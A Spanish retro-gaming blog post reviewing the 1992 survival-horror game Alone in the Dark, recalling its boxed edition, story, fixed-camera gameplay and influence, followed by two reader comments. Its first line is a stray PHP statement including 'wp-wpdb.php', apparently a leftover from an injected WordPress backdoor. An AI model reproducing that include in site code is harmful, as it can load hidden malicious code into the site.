if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Alone in the Dark, el precursor del survival horror – La Fortaleza de LeChuck

Alone in the Dark, el precursor del survival horror

Hoy es Halloween, ¡oh si! gente duchada en sangre, con ropas raídas y en general pintas realmente lamentables, pero como veis no voy a mostraros una galería de disfraces con féminas ligeritas de ropa, ni de machotes enseñando bíceps (esto hubiera sido más probable en mi caso jurs), sino algo mucho mejor! un juego clásico terrorífico ¡Os lo aseguro! Me pasé varias semanas pensando seriamente en sellar las ventanas de mi cuarto para que no saltaran perros asesinos, ejem. Así que voy a hablaros de Alone in the Dark (el original, no bazofias de nuevo siglo), uno de los precursores del género Survival Horror.

Alone in the Dark

Como muchos juegos de antaño, conocí Alone in the Dark por la Micromanía, fue esa época que los píxeles se iban quedando poco a poco atrás y los videojuegos se abrían al maravilloso mundo de los polígonos, uno de los primeros que pasaron por mi casa fue Alone in the Dark.

Lo primero que me sorprendió de Alone in the Dark fue la cuidada edición en caja grande (que aún conservamos), contenía un mini periódico llamado The Mistery Examiner, que narraba el caso del juego e incluía anuncios ficticios y otro tipo de información muy original, un mini libro de claves encuadernado y los pertinentes discos y manual. Así si que se sentía uno orgulloso de su compra, no como las cajas peladas de ahora, pero eso ya es otra historia. Como extra, mi hermano recortó e incluyo dentro la genial guía de la Micromania, con imágenes de las diferentes zonas y narrado en primera persona como si de una novela se tratara.
Más bonita que las pesetas
Alone in the Dark fue lanzado en 1992 por Infogrames para PC y nos adentraba en una historia de terror en la gran mansión Derceto, donde el propietario, Jeremy Hartwood, se ha suicidado, pero las causas de su supuesto suicidio son un misterio. Sin embargo, nadie se sorprende, ya que sobre la mansión corren rumores de que está habitada por un poder maligno. El caso fue archivado por las autoridades, pero ahora hemos sido contratados para investigar la mansión. Horribles monstruos, espeluznantes catacumbas y pasillos oscuros presagian un mal mucho mayor de lo que imaginábamos. Tendremos la posibilidad de escoger entre 2 personajes, el detective Edward Carnby o Emily Hartwood, sobrina del fallecido, y así descubrir la verdad detrás de la misteriosa muerte de Jeremy, y lo que es más difícil, sobrevivir en la mansión.
Alone in the Dark

El juego combina los puzles y la acción. El personaje puede manipular objetos del entorno, y almacernarlos en el inventario, mientras busca de una habitación a otra pistas para resolver los puzles (algunos de ellos se podían resolver de diferentes formas) y lograr pasar a la siguiente zona, intentando repeler los ataques de las criaturas. Para luchar contra los seres hostiles, se pueden utilizar varios tipos de armas, desde cuchillos, espadas o botellas, a armas de fuego como rifles, pistolas y escopetas. La dificultad reside en apuntar, ya que las posiciones de las cámaras fijas de cada habitación puede ser un calvario, y es algo a tener en cuenta para conservar la escasa munición. De todas formas, la acción no es tan alta y el juego se basa principalmente en la exploración y la resolución de puzles. Su nivel de dificultad es bastante elevado, así que se agradece que permita guardar la partida en cualquier momento. Hay que destacar que es mucho menos lineal que la mayoría de los juegos de survival horror, por lo que podremos explorar la mansión de arriba abajo prácticamente desde el principio.

Alone in the Dark

Alone in the Dark inspiró a toda una nueva generación al combinar la acción con elementos de aventura en tiempo real con gráficos 3D poligonales sobre fondos prerrenderizados en 2D. El juego utiliza múltiples ángulos de cámara para crear espectaculares tomas cinematográficas que se reproducen como una película. El sonido compuesto por un abanico de espeluznantes efectos y música excelente contribuyen a crear una atmósfera intensa y opresiva. Juegos posteriores como Resident Evil han sido consecuencia del buen hacer de este título. Lamentablemente, con el paso de los años, todos sus méritos se los han llevado juegos posteriores como el ya citado Resident Evil.

En el inventario los objetos en 3D giraban sobre si mismos
A pesar de afamado motor del juego, creado por Infogrames, el cual consiguió diversos premios, el aspecto poligonal de los personajes no es tan agradable como los pixelizados. Los personajes no se mezclan bien con el entorno estático, además no hay ningún control en los ángulos de la cámara, están predeterminados para cada escena, y como hemos apuntado, eso nos dará más de un problema, y susto. El movimiento del personaje parece torpe a veces y en ocasiones es desesperante. Otro problema es que para coger o usar objetos deberemos colocarnos en el lugar correcto de la pantalla.
A ciegas pa’alante. Por cierto, esa gárgola y sus berreos me daban mucho miedo

Alone in the Dark se lanzó en PC en dos versiones, disquete y CD-ROM. Este último incluye muchas mejoras respecto al original, como voces en off y una banda sonora que no se encuentra en el original. Además incluía la mini aventura Jack in the Dark, protagonizada por una niña que se queda encerrada en una juguetería la noche de Halloween. A diferencia de Alone in the Dark, no incluía acción, tan solo puzles.

Alone in the Dark

Podría hablaros también sobre la película de imagen real “basada” en Alone in the Dark con el mismo nombre,pero eso si que realmente da pavor, así que os ahorraré el mal trago.

Tengo muchos buenos recuerdos de este título, el cual reconozco que no me pasé, ya que unos cuantos sustos fueron suficientes para que pasara a ser espectadora activa de la partida de mi hermano, quien si lo finalizó, y siempre me avisaba cuando jugaba para que le echara una mano con los enigmas.
Alone in the Dark fue un juego innovador que utilizó un revolucionario motor para ofrecer una mezcla única de juego de aventura y acción, junto con una historia de terror inspirada en la obra de HP Lovecraft, que da un nuevo giro escalofriante al género de los juegos de aventuras gráficas transformándolo en un survival horror.
Publicada el
Categorizado como Retro Etiquetado como

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

6 comentarios

  1. ¡Qué recuerdos! Cuando el mundo se medía en floppys y los polígonos aún no dominaban el mundo. Nuestra querida Arashi ha sabido transmitirnos ese sabor añejo y meláncolico de aquellas producciones en vga. Y no, tampoco logré pasármelo, aquellos ángulos de cámara imposibles eran demasiado para mi paciencia y dioptrías, además de los cursores tenía el corazón en un puño. I love this games.

  2. Nunca fuí capaz de jugarlo mucho rato, realmente me daba mucho miedo! Ahora de mayor parece mentira que pudiera asustarme estos gráficos 3D prehistóricos, pero bueno, entonces me daba mal rollo hasta caerme en los fosos de pinchos del Prince of Persia.

    Y sí, aunque no fué el primero realmente éste debería ser considerado el papi de los survival horror, y no Resident Evil, que sin

Dejar un comentario